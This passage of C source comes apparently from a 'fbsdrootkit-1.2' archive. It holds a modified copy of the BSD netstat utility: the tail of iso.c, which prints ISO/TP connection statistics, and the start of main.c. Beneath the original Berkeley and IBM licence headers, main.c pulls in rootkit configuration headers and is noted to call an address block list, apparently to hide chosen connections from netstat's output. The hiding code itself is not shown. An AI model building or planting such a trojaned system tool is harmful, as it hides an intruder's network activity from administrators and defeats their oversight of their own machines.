* * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char sccsid[] = "@(#)iso.c 8.1 (Berkeley) 6/6/93"; #endif /* not lint */ /* * $Header: /home/ncvs/src/usr.bin/netstat/iso.c,v 1.2.4.1 1996/06/05 02:57:17 jkh Exp $ * $Source: /home/ncvs/src/usr.bin/netstat/iso.c,v $ */ /******************************************************************************* Copyright IBM Corporation 1987 All Rights Reserved Permission to use, copy, modify, and distribute this software and its documentation for any purpose and without fee is hereby granted, provided that the above copyright notice appear in all copies and that both that copyright notice and this permission notice appear in supporting documentation, and that the name of IBM not be used in advertising or publicity pertaining to distribution of the software without specific, written prior permission. IBM DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. 
IN NO EVENT SHALL IBM BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. *******************************************************************************/ /* * ARGO Project, Computer Sciences Dept., University of Wisconsin - Madison */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #undef satosiso #include #include #include #include #include #include #include #ifdef IncStat #undef IncStat #endif #include #include #include #include #include #include #include "netstat.h" static void tprintstat __P((struct tp_stat *, int)); static void isonetprint __P((struct sockaddr_iso *, int)); static void hexprint __P((int, char *, char *)); extern void inetprint __P((struct in_addr *, int, char *)); /* * Dump esis stats */ void esis_stats(off, name) u_long off; char *name; { struct esis_stat esis_stat; if (off == 0 || kread(off, (char *)&esis_stat, sizeof (struct esis_stat))) return; printf("%s:\n", name); printf("\t%d esh sent, %d esh received\n", esis_stat.es_eshsent, esis_stat.es_eshrcvd); printf("\t%d ish sent, %d ish received\n", esis_stat.es_ishsent, esis_stat.es_ishrcvd); printf("\t%d rd sent, %d rd received\n", esis_stat.es_rdsent, esis_stat.es_rdrcvd); printf("\t%d pdus not sent due to insufficient memory\n", esis_stat.es_nomem); printf("\t%d pdus received with bad checksum\n", esis_stat.es_badcsum); printf("\t%d pdus received with bad version number\n", esis_stat.es_badvers); printf("\t%d pdus received with bad type field\n", esis_stat.es_badtype); printf("\t%d short pdus received\n", esis_stat.es_toosmall); } /* * Dump clnp statistics structure. 
 */
void
clnp_stats(off, name)
	u_long off;
	char *name;
{
	struct clnp_stat cs;

	/* Nothing to print without a symbol address or after a failed read. */
	if (off == 0)
		return;
	if (kread(off, (char *)&cs, sizeof (cs)))
		return;

	printf("%s:\n\t%d total packets sent\n", name, cs.cns_sent);
	printf("\t%d total fragments sent\n", cs.cns_fragments);
	printf("\t%d total packets received\n", cs.cns_total);
	printf("\t%d with fixed part of header too small\n", cs.cns_toosmall);
	printf("\t%d with header length not reasonable\n", cs.cns_badhlen);
	printf("\t%d incorrect checksum%s\n", cs.cns_badcsum,
	    plural(cs.cns_badcsum));
	printf("\t%d with unreasonable address lengths\n", cs.cns_badaddr);
	printf("\t%d with forgotten segmentation information\n", cs.cns_noseg);
	printf("\t%d with an incorrect protocol identifier\n", cs.cns_noproto);
	printf("\t%d with an incorrect version\n", cs.cns_badvers);
	printf("\t%d dropped because the ttl has expired\n", cs.cns_ttlexpired);
	printf("\t%d clnp cache misses\n", cs.cns_cachemiss);
	printf("\t%d clnp congestion experience bits set\n", cs.cns_congest_set);
	printf("\t%d clnp congestion experience bits received\n",
	    cs.cns_congest_rcvd);
}

/*
 * Dump CLTP statistics structure.
 */
void
cltp_stats(off, name)
	u_long off;
	char *name;
{
	struct cltpstat st;

	/* Same guard as clnp_stats(): no address or failed read, no output. */
	if (off == 0)
		return;
	if (kread(off, (char *)&st, sizeof (st)))
		return;

	printf("%s:\n\t%u incomplete header%s\n", name,
	    st.cltps_hdrops, plural(st.cltps_hdrops));
	printf("\t%u bad data length field%s\n",
	    st.cltps_badlen, plural(st.cltps_badlen));
	printf("\t%u bad checksum%s\n",
	    st.cltps_badsum, plural(st.cltps_badsum));
}

/* Scratch copies of kernel structures, filled in through kget(). */
struct tp_pcb tpcb;
struct isopcb isopcb;
struct socket sockb;
union {
	struct sockaddr_iso siso;
	char data[128];
} laddr, faddr;

/* Read sizeof (p) bytes from kernel address o into p; non-zero on failure. */
#define kget(o, p) \
	(kread((u_long)(o), (char *)&p, sizeof (p)))

/* Set until the connection-table heading has been printed once. */
static int first = 1;

/*
 * Print a summary of connections related to an Internet
 * protocol.
For TP, also give state of connection. * Listening processes (aflag) are suppressed unless the * -a (all) flag is specified. */ void iso_protopr(off, name) u_long off; char *name; { struct isopcb cb; register struct isopcb *prev, *next; if (off == 0) { printf("%s control block: symbol not in namelist\n", name); return; } if (strcmp(name, "tp") == 0) { tp_protopr(off, name); return; } if (kread(off, (char *)&cb, sizeof(cb))) return; isopcb = cb; prev = (struct isopcb *)off; if (isopcb.isop_next == (struct isopcb *)off) return; while (isopcb.isop_next != (struct isopcb *)off) { next = isopcb.isop_next; kget(next, isopcb); if (isopcb.isop_prev != prev) { printf("prev 0x%x next 0x%x isop_prev 0x%x isop_next 0x%x???\n", prev, next, isopcb.isop_prev, isopcb.isop_next); break; } kget(isopcb.isop_socket, sockb); iso_protopr1((u_long)next, 0); putchar('\n'); prev = next; } } void iso_protopr1(kern_addr, istp) u_long kern_addr; int istp; { if (first) { printf("Active ISO net connections"); if (aflag) printf(" (including servers)"); putchar('\n'); if (Aflag) printf("%-8.8s ", "PCB"); printf(Aflag ? "%-5.5s %-6.6s %-6.6s %-18.18s %-18.18s %s\n" : "%-5.5s %-6.6s %-6.6s %-22.22s %-22.22s %s\n", "Proto", "Recv-Q", "Send-Q", "Local Address", "Foreign Address", "(state)"); first = 0; } if (Aflag) printf("%8x ", (sockb.so_pcb ? 
(void *)sockb.so_pcb : (void *)kern_addr)); printf("%-5.5s %6d %6d ", "tp", sockb.so_rcv.sb_cc, sockb.so_snd.sb_cc); if (istp && tpcb.tp_lsuffixlen) { hexprint(tpcb.tp_lsuffixlen, tpcb.tp_lsuffix, "()"); printf("\t"); } else if (isopcb.isop_laddr == 0) printf("*.*\t"); else { if ((char *)isopcb.isop_laddr == ((char *)kern_addr) + _offsetof(struct isopcb, isop_sladdr)) laddr.siso = isopcb.isop_sladdr; else kget(isopcb.isop_laddr, laddr); isonetprint((struct sockaddr_iso *)&laddr, 1); } if (istp && tpcb.tp_fsuffixlen) { hexprint(tpcb.tp_fsuffixlen, tpcb.tp_fsuffix, "()"); printf("\t"); } else if (isopcb.isop_faddr == 0) printf("*.*\t"); else { if ((char *)isopcb.isop_faddr == ((char *)kern_addr) + _offsetof(struct isopcb, isop_sfaddr)) faddr.siso = isopcb.isop_sfaddr; else kget(isopcb.isop_faddr, faddr); isonetprint((struct sockaddr_iso *)&faddr, 0); } } void tp_protopr(off, name) u_long off; char *name; { extern char *tp_sstring[]; struct tp_ref *tpr, *tpr_base; struct tp_refinfo tpkerninfo; int size; kget(off, tpkerninfo); size = tpkerninfo.tpr_size * sizeof (*tpr); tpr_base = (struct tp_ref *)malloc(size); if (tpr_base == 0) return; kread((u_long)(tpkerninfo.tpr_base), (char *)tpr_base, size); for (tpr = tpr_base; tpr < tpr_base + tpkerninfo.tpr_size; tpr++) { if (tpr->tpr_pcb == 0) continue; kget(tpr->tpr_pcb, tpcb); if (tpcb.tp_state == ST_ERROR) printf("undefined tpcb state: 0x%x\n", tpr->tpr_pcb); if (!aflag && (tpcb.tp_state == TP_LISTENING || tpcb.tp_state == TP_CLOSED || tpcb.tp_state == TP_REFWAIT)) { continue; } kget(tpcb.tp_sock, sockb); if (tpcb.tp_npcb) switch(tpcb.tp_netservice) { case IN_CLNS: tp_inproto((u_long)tpkerninfo.tpr_base); break; default: kget(tpcb.tp_npcb, isopcb); iso_protopr1((u_long)tpcb.tp_npcb, 1); break; } if (tpcb.tp_state >= tp_NSTATES) printf(" %d", tpcb.tp_state); else printf(" %-12.12s", tp_sstring[tpcb.tp_state]); putchar('\n'); } } void tp_inproto(pcb) u_long pcb; { struct inpcb inpcb; kget(tpcb.tp_npcb, inpcb); if (!aflag && 
inet_lnaof(inpcb.inp_laddr) == INADDR_ANY) return; if (Aflag) printf("%8x ", pcb); printf("%-5.5s %6d %6d ", "tpip", sockb.so_rcv.sb_cc, sockb.so_snd.sb_cc); inetprint(&inpcb.inp_laddr, inpcb.inp_lport, "tp"); inetprint(&inpcb.inp_faddr, inpcb.inp_fport, "tp"); } /* * Pretty print an iso address (net address + port). * If the nflag was specified, use numbers instead of names. */ #ifdef notdef char * isonetname(iso) register struct iso_addr *iso; { struct sockaddr_iso sa; struct iso_hostent *ihe = 0; struct iso_hostent *iso_gethostentrybyaddr(); struct iso_hostent *iso_getserventrybytsel(); struct iso_hostent Ihe; static char line[80]; bzero(line, sizeof(line)); if( iso->isoa_afi ) { sa.siso_family = AF_ISO; sa.siso_addr = *iso; sa.siso_tsuffix = 0; if (!nflag ) ihe = iso_gethostentrybyaddr( &sa, 0, 0 ); if( ihe ) { Ihe = *ihe; ihe = &Ihe; sprintf(line, "%s", ihe->isoh_hname); } else { sprintf(line, "%s", iso_ntoa(iso)); } } else { sprintf(line, "*"); } return line; } static void isonetprint(iso, sufx, sufxlen, islocal) register struct iso_addr *iso; char *sufx; u_short sufxlen; int islocal; { struct iso_hostent *iso_getserventrybytsel(), *ihe; struct iso_hostent Ihe; char *line, *cp; int Alen = Aflag?18:22; line = isonetname(iso); cp = index(line, '\0'); ihe = (struct iso_hostent *)0; if( islocal ) islocal = 20; else islocal = 22 + Alen; if(Aflag) islocal += 10 ; if(!nflag) { if( (cp -line)>10 ) { cp = line+10; bzero(cp, sizeof(line)-10); } } *cp++ = '.'; if(sufxlen) { if( !Aflag && !nflag && (ihe=iso_getserventrybytsel(sufx, sufxlen))) { Ihe = *ihe; ihe = &Ihe; } if( ihe && (strlen(ihe->isoh_aname)>0) ) { sprintf(cp, "%s", ihe->isoh_aname); } else { iso_sprinttsel(cp, sufx, sufxlen); } } else sprintf(cp, "*"); /* fprintf(stdout, Aflag?" 
%-18.18s":" %-22.22s", line); */ if( strlen(line) > Alen ) { fprintf(stdout, " %s", line); fprintf(stdout, "\n %*.s", islocal+Alen," "); } else { fprintf(stdout, " %-*.*s", Alen, Alen,line); } } #endif #ifdef notdef static void x25_protopr(off, name) u_long off; char *name; { static char *xpcb_states[] = { "CLOSED", "LISTENING", "CLOSING", "CONNECTING", "ACKWAIT", "OPEN", }; register struct isopcb *prev, *next; struct x25_pcb xpcb; if (off == 0) { printf("%s control block: symbol not in namelist\n", name); return; } kread(off, &xpcb, sizeof (struct x25_pcb)); prev = (struct isopcb *)off; if (xpcb.x_next == (struct isopcb *)off) return; while (xpcb.x_next != (struct isopcb *)off) { next = isopcb.isop_next; kread((u_long)next, &xpcb, sizeof (struct x25_pcb)); if (xpcb.x_prev != prev) { printf("???\n"); break; } kread((u_long)xpcb.x_socket, &sockb, sizeof (sockb)); if (!aflag && xpcb.x_state == LISTENING || xpcb.x_state == TP_CLOSED ) { prev = next; continue; } if (first) { printf("Active X25 net connections"); if (aflag) printf(" (including servers)"); putchar('\n'); if (Aflag) printf("%-8.8s ", "PCB"); printf(Aflag ? 
"%-5.5s %-6.6s %-6.6s %-18.18s %-18.18s %s\n" : "%-5.5s %-6.6s %-6.6s %-22.22s %-22.22s %s\n", "Proto", "Recv-Q", "Send-Q", "Local Address", "Foreign Address", "(state)"); first = 0; } printf("%-5.5s %6d %6d ", name, sockb.so_rcv.sb_cc, sockb.so_snd.sb_cc); isonetprint(&xpcb.x_laddr.siso_addr, &xpcb.x_lport, sizeof(xpcb.x_lport), 1); isonetprint(&xpcb.x_faddr.siso_addr, &xpcb.x_fport, sizeof(xpcb.x_lport), 0); if (xpcb.x_state < 0 || xpcb.x_state >= x25_NSTATES) printf(" 0x0x0x0x0x0x0x0x0x%x", xpcb.x_state); else printf(" %-12.12s", xpcb_states[xpcb.x_state]); putchar('\n'); prev = next; } } #endif struct tp_stat tp_stat; void tp_stats(off, name) caddr_t off, name; { if (off == 0) { printf("TP not configured\n\n"); return; } printf("%s:\n", name); kget(off, tp_stat); tprintstat(&tp_stat, 8); } #define OUT stdout static void tprintstat(s, indent) register struct tp_stat *s; int indent; { fprintf(OUT, "%*sReceiving:\n",indent," "); fprintf(OUT, "\t%*s%d variable parameter%s ignored\n", indent," ", s->ts_param_ignored ,plural(s->ts_param_ignored)); fprintf(OUT, "\t%*s%d invalid parameter code%s\n", indent, " ", s->ts_inv_pcode ,plural(s->ts_inv_pcode)); fprintf(OUT, "\t%*s%d invalid parameter value%s\n", indent, " ", s->ts_inv_pval ,plural(s->ts_inv_pval)); fprintf(OUT, "\t%*s%d invalid dutype%s\n", indent, " ", s->ts_inv_dutype ,plural(s->ts_inv_dutype)); fprintf(OUT, "\t%*s%d negotiation failure%s\n", indent, " ", s->ts_negotfailed ,plural(s->ts_negotfailed)); fprintf(OUT, "\t%*s%d invalid destination reference%s\n", indent, " ", s->ts_inv_dref ,plural(s->ts_inv_dref)); fprintf(OUT, "\t%*s%d invalid suffix parameter%s\n", indent, " ", s->ts_inv_sufx ,plural(s->ts_inv_sufx)); fprintf(OUT, "\t%*s%d invalid length\n",indent, " ", s->ts_inv_length); fprintf(OUT, "\t%*s%d invalid checksum%s\n", indent, " ", s->ts_bad_csum ,plural(s->ts_bad_csum)); fprintf(OUT, "\t%*s%d DT%s out of order\n", indent, " ", s->ts_dt_ooo ,plural(s->ts_dt_ooo)); fprintf(OUT, "\t%*s%d DT%s not 
in window\n", indent, " ", s->ts_dt_niw ,plural(s->ts_dt_niw)); fprintf(OUT, "\t%*s%d duplicate DT%s\n", indent, " ", s->ts_dt_dup ,plural(s->ts_dt_dup)); fprintf(OUT, "\t%*s%d XPD%s not in window\n", indent, " ", s->ts_xpd_niw ,plural(s->ts_xpd_niw)); fprintf(OUT, "\t%*s%d XPD%s w/o credit to stash\n", indent, " ", s->ts_xpd_dup ,plural(s->ts_xpd_dup)); fprintf(OUT, "\t%*s%d time%s local credit reneged\n", indent, " ", s->ts_lcdt_reduced ,plural(s->ts_lcdt_reduced)); fprintf(OUT, "\t%*s%d concatenated TPDU%s\n", indent, " ", s->ts_concat_rcvd ,plural(s->ts_concat_rcvd)); fprintf(OUT, "%*sSending:\n", indent, " "); fprintf(OUT, "\t%*s%d XPD mark%s discarded\n", indent, " ", s->ts_xpdmark_del ,plural(s->ts_xpdmark_del)); fprintf(OUT, "\t%*sXPD stopped data flow %d time%s\n", indent, " ", s->ts_xpd_intheway ,plural(s->ts_xpd_intheway)); fprintf(OUT, "\t%*s%d time%s foreign window closed\n", indent, " ", s->ts_zfcdt ,plural(s->ts_zfcdt)); fprintf(OUT, "%*sMiscellaneous:\n", indent, " "); fprintf(OUT, "\t%*s%d small mbuf%s\n", indent, " ", s->ts_mb_small ,plural(s->ts_mb_small)); fprintf(OUT, "\t%*s%d cluster%s\n", indent, " ", s->ts_mb_cluster, plural(s->ts_mb_cluster)); fprintf(OUT, "\t%*s%d source quench \n",indent, " ", s->ts_quench); fprintf(OUT, "\t%*s%d dec bit%s\n", indent, " ", s->ts_rcvdecbit, plural(s->ts_rcvdecbit)); fprintf(OUT, "\t%*sM:L ( M mbuf chains of length L)\n", indent, " "); { register int j; fprintf(OUT, "\t%*s%d: over 16\n", indent, " ", s->ts_mb_len_distr[0]); for( j=1; j<=8; j++) { fprintf(OUT, "\t%*s%d: %d\t\t%d: %d\n", indent, " ", s->ts_mb_len_distr[j],j, s->ts_mb_len_distr[j<<1],j<<1 ); } } fprintf(OUT, "\t%*s%d EOT rcvd\n", indent, " ", s->ts_eot_input); fprintf(OUT, "\t%*s%d EOT sent\n", indent, " ", s->ts_EOT_sent); fprintf(OUT, "\t%*s%d EOT indication%s\n", indent, " ", s->ts_eot_user ,plural(s->ts_eot_user)); fprintf(OUT, "%*sConnections:\n", indent, " "); fprintf(OUT, "\t%*s%d connection%s used extended format\n", indent, " ", 
s->ts_xtd_fmt ,plural(s->ts_xtd_fmt)); fprintf(OUT, "\t%*s%d connection%s allowed transport expedited data\n", indent, " ", s->ts_use_txpd ,plural(s->ts_use_txpd)); fprintf(OUT, "\t%*s%d connection%s turned off checksumming\n", indent, " ", s->ts_csum_off ,plural(s->ts_csum_off)); fprintf(OUT, "\t%*s%d connection%s dropped due to retrans limit\n", indent, " ", s->ts_conn_gaveup ,plural(s->ts_conn_gaveup)); fprintf(OUT, "\t%*s%d tp 4 connection%s\n", indent, " ", s->ts_tp4_conn ,plural(s->ts_tp4_conn)); fprintf(OUT, "\t%*s%d tp 0 connection%s\n", indent, " ", s->ts_tp0_conn ,plural(s->ts_tp0_conn)); { register int j; static char *name[]= { "~LOCAL, PDN", "~LOCAL,~PDN", " LOCAL,~PDN", " LOCAL, PDN" }; fprintf(OUT, "\n%*sRound trip times, listed in ticks:\n", indent, " "); fprintf(OUT, "\t%*s%11.11s %12.12s | %12.12s | %s\n", indent, " ", "Category", "Smoothed avg", "Deviation", "Deviation/Avg"); for (j = 0; j <= 3; j++) { fprintf(OUT, "\t%*s%11.11s: %-11d | %-11d | %-11d | %-11d\n", indent, " ", name[j], s->ts_rtt[j], s->ts_rtt[j], s->ts_rtv[j], s->ts_rtv[j]); } } fprintf(OUT, "\n%*sTpdus RECVD [%d valid, %3.6f %% of total (%d); %d dropped]\n",indent," ", s->ts_tpdu_rcvd , ((s->ts_pkt_rcvd > 0) ? 
((100 * (float)s->ts_tpdu_rcvd)/(float)s->ts_pkt_rcvd) : 0), s->ts_pkt_rcvd, s->ts_recv_drop ); fprintf(OUT, "\t%*sDT %6d AK %6d DR %4d CR %4d \n", indent, " ", s->ts_DT_rcvd, s->ts_AK_rcvd, s->ts_DR_rcvd, s->ts_CR_rcvd); fprintf(OUT, "\t%*sXPD %6d XAK %6d DC %4d CC %4d ER %4d\n", indent, " ", s->ts_XPD_rcvd, s->ts_XAK_rcvd, s->ts_DC_rcvd, s->ts_CC_rcvd, s->ts_ER_rcvd); fprintf(OUT, "\n%*sTpdus SENT [%d total, %d dropped]\n", indent, " ", s->ts_tpdu_sent, s->ts_send_drop); fprintf(OUT, "\t%*sDT %6d AK %6d DR %4d CR %4d \n", indent, " ", s->ts_DT_sent, s->ts_AK_sent, s->ts_DR_sent, s->ts_CR_sent); fprintf(OUT, "\t%*sXPD %6d XAK %6d DC %4d CC %4d ER %4d\n", indent, " ", s->ts_XPD_sent, s->ts_XAK_sent, s->ts_DC_sent, s->ts_CC_sent, s->ts_ER_sent); fprintf(OUT, "\n%*sRetransmissions:\n", indent, " "); #define PERCENT(X,Y) (((Y)>0)?((100 *(float)(X)) / (float) (Y)):0) fprintf(OUT, "\t%*sCR %6d CC %6d DR %6d \n", indent, " ", s->ts_retrans_cr, s->ts_retrans_cc, s->ts_retrans_dr); fprintf(OUT, "\t%*sDT %6d (%5.2f%%)\n", indent, " ", s->ts_retrans_dt, PERCENT(s->ts_retrans_dt, s->ts_DT_sent)); fprintf(OUT, "\t%*sXPD %6d (%5.2f%%)\n", indent, " ", s->ts_retrans_xpd, PERCENT(s->ts_retrans_xpd, s->ts_XPD_sent)); fprintf(OUT, "\n%*sE Timers: [%6d ticks]\n", indent, " ", s->ts_Eticks); fprintf(OUT, "%*s%6d timer%s set \t%6d timer%s expired \t%6d timer%s cancelled\n",indent, " ", s->ts_Eset ,plural(s->ts_Eset), s->ts_Eexpired ,plural(s->ts_Eexpired), s->ts_Ecan_act ,plural(s->ts_Ecan_act)); fprintf(OUT, "\n%*sC Timers: [%6d ticks]\n", indent, " ",s->ts_Cticks); fprintf(OUT, "%*s%6d timer%s set \t%6d timer%s expired \t%6d timer%s cancelled\n", indent, " ", s->ts_Cset ,plural(s->ts_Cset), s->ts_Cexpired ,plural(s->ts_Cexpired), s->ts_Ccan_act ,plural(s->ts_Ccan_act)); fprintf(OUT, "%*s%6d inactive timer%s cancelled\n", indent, " ", s->ts_Ccan_inact ,plural(s->ts_Ccan_inact)); fprintf(OUT, "\n%*sPathological debugging activity:\n", indent, " "); fprintf(OUT, "\t%*s%6d CC%s sent to 
zero dref\n", indent, " ", s->ts_zdebug ,plural(s->ts_zdebug)); /* SAME LINE AS ABOVE */ fprintf(OUT, "\t%*s%6d random DT%s dropped\n", indent, " ", s->ts_ydebug ,plural(s->ts_ydebug)); fprintf(OUT, "\t%*s%6d illegally large XPD TPDU%s\n", indent, " ", s->ts_vdebug ,plural(s->ts_vdebug)); fprintf(OUT, "\t%*s%6d faked reneging of cdt\n", indent, " ", s->ts_ldebug ); fprintf(OUT, "\n%*sACK reasons:\n", indent, " "); fprintf(OUT, "\t%*s%6d not acked immediately\n", indent, " ", s->ts_ackreason[_ACK_DONT_] ); fprintf(OUT, "\t%*s%6d strategy==each\n", indent, " ", s->ts_ackreason[_ACK_STRAT_EACH_] ); fprintf(OUT, "\t%*s%6d strategy==fullwindow\n", indent, " ", s->ts_ackreason[_ACK_STRAT_FULLWIN_] ); fprintf(OUT, "\t%*s%6d duplicate DT\n", indent, " ", s->ts_ackreason[_ACK_DUP_] ); fprintf(OUT, "\t%*s%6d EOTSDU\n", indent, " ", s->ts_ackreason[_ACK_EOT_] ); fprintf(OUT, "\t%*s%6d reordered DT\n", indent, " ", s->ts_ackreason[_ACK_REORDER_] ); fprintf(OUT, "\t%*s%6d user rcvd\n", indent, " ", s->ts_ackreason[_ACK_USRRCV_] ); fprintf(OUT, "\t%*s%6d fcc reqd\n", indent, " ", s->ts_ackreason[_ACK_FCC_] ); } #ifndef SSEL #define SSEL(s) ((s)->siso_tlen + TSEL(s)) #define PSEL(s) ((s)->siso_slen + SSEL(s)) #endif static void isonetprint(siso, islocal) register struct sockaddr_iso *siso; int islocal; { hexprint(siso->siso_nlen, siso->siso_addr.isoa_genaddr, "{}"); if (siso->siso_tlen || siso->siso_slen || siso->siso_plen) hexprint(siso->siso_tlen, TSEL(siso), "()"); if (siso->siso_slen || siso->siso_plen) hexprint(siso->siso_slen, SSEL(siso), "[]"); if (siso->siso_plen) hexprint(siso->siso_plen, PSEL(siso), "<>"); putchar(' '); } static char hexlist[] = "0123456789abcdef", obuf[128]; static void hexprint(n, buf, delim) int n; char *buf, *delim; { register u_char *in = (u_char *)buf, *top = in + n; register char *out = obuf; register int i; if (n == 0) return; while (in < top) { i = *in++; *out++ = '.'; if (i > 0xf) { out[1] = hexlist[i & 0xf]; i >>= 4; out[0] = hexlist[i]; out 
+= 2; } else *out++ = hexlist[i]; } *obuf = *delim; *out++ = delim[1]; *out = 0; printf("%s", obuf); } fbsdrootkit-1.2/netstat/main.c100600 764 0 30122 6257601725 14246 0ustar dfroot/* * Copyright (c) 1983, 1988, 1993 * Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
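 */

#ifndef lint
char copyright[] =
"@(#) Copyright (c) 1983, 1988, 1993\n\
 Regents of the University of California. All rights reserved.\n";
#endif /* not lint */

#ifndef lint
static char sccsid[] = "@(#)main.c 8.4 (Berkeley) 3/1/94";
#endif /* not lint */

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include "netstat.h"

/* Rootkit configuration files */
/*
 * NOTE(review): the three lines below pull in the archive's own config.h
 * and rootkitnetstat.h.  showall and addr_block_list(), both used in
 * main(), are not declared anywhere in this file -- presumably they come
 * from these headers; confirm there.
 */
#include "../config.h"
#define MAIN_DOT_C
#include "../rootkitnetstat.h"

/*
 * Kernel symbols resolved through kvm_nlist().  Each #define is the index
 * of the entry that follows it; the empty name terminates the list.
 */
struct nlist nl[] = {
#define	N_MBSTAT	0
	{ "_mbstat" },
#define	N_IPSTAT	1
	{ "_ipstat" },
#define	N_TCB		2
	{ "_tcb" },
#define	N_TCPSTAT	3
	{ "_tcpstat" },
#define	N_UDB		4
	{ "_udb" },
#define	N_UDPSTAT	5
	{ "_udpstat" },
#define	N_IFNET		6
	{ "_ifnet" },
#define	N_IMP		7
	{ "_imp_softc" },
#define	N_ICMPSTAT	8
	{ "_icmpstat" },
#define	N_RTSTAT	9
	{ "_rtstat" },
#define	N_UNIXSW	10
	{ "_localsw" },
#define N_IDP		11
	{ "_nspcb"},
#define N_IDPSTAT	12
	{ "_idpstat"},
#define N_SPPSTAT	13
	{ "_spp_istat"},
#define N_NSERR		14
	{ "_ns_errstat"},
#define	N_CLNPSTAT	15
	{ "_clnp_stat"},
#define	IN_NOTUSED	16
	{ "_tp_inpcb" },
#define	ISO_TP		17
	{ "_tp_refinfo" },
#define	N_TPSTAT	18
	{ "_tp_stat" },
#define	N_ESISSTAT	19
	{ "_esis_stat"},
#define N_NIMP		20
	{ "_nimp"},
#define N_RTREE		21
	{ "_rt_tables"},
#define N_CLTP		22
	{ "_cltb"},
#define N_CLTPSTAT	23
	{ "_cltpstat"},
#define	N_NFILE		24
	{ "_nfile" },
#define	N_FILE		25
	{ "_file" },
#define N_IGMPSTAT	26
	{ "_igmpstat" },
#define N_MRTPROTO	27
	{ "_ip_mrtproto" },
#define N_MRTSTAT	28
	{ "_mrtstat" },
#define N_MFCTABLE	29
	{ "_mfctable" },
#define N_VIFTABLE	30
	{ "_viftable" },
	"",
};

/*
 * Per-protocol dispatch table.  An index of -1 marks "no such symbol";
 * stored in a u_char it becomes 255, which is outside nl[], so it must
 * never be used as a subscript (see printproto()).
 */
struct protox {
	u_char	pr_index;		/* index into nlist of cb head */
	u_char	pr_sindex;		/* index into nlist of stat block */
	u_char	pr_wanted;		/* 1 if wanted, 0 otherwise */
	void	(*pr_cblocks)();	/* control blocks printing routine */
	void	(*pr_stats)();		/* statistics printing routine */
	char	*pr_name;		/* well-known name */
} protox[] = {
	{ N_TCB,	N_TCPSTAT,	1,	protopr,
	  tcp_stats,	"tcp" },
	{ N_UDB,	N_UDPSTAT,	1,	protopr,
	  udp_stats,	"udp" },
	{ -1,		N_IPSTAT,	1,	0,
	  ip_stats,	"ip" },
	{ -1,		N_ICMPSTAT,	1,	0,
	  icmp_stats,	"icmp" },
	{ -1,		N_IGMPSTAT,	1,	0,
	  igmp_stats,	"igmp" },
	{ -1,		-1,		0,	0,
	  0,		0 }
};

struct protox nsprotox[] = {
	{ N_IDP,	N_IDPSTAT,	1,	nsprotopr,
	  idp_stats,	"idp" },
	{ N_IDP,	N_SPPSTAT,	1,	nsprotopr,
	  spp_stats,	"spp" },
	{ -1,		N_NSERR,	1,	0,
	  nserr_stats,	"ns_err" },
	{ -1,		-1,		0,	0,
	  0,		0 }
};

struct protox isoprotox[] = {
	{ ISO_TP,	N_TPSTAT,	1,	iso_protopr,
	  tp_stats,	"tp" },
	{ N_CLTP,	N_CLTPSTAT,	1,	iso_protopr,
	  cltp_stats,	"cltp" },
	{ -1,		N_CLNPSTAT,	1,	 0,
	  clnp_stats,	"clnp"},
	{ -1,		N_ESISSTAT,	1,	 0,
	  esis_stats,	"esis"},
	{ -1,		-1,		0,	0,
	  0,		0 }
};

struct protox *protoprotox[] = { protox, nsprotox, isoprotox, NULL };

static void printproto __P((struct protox *, char *));
static void usage __P((void));
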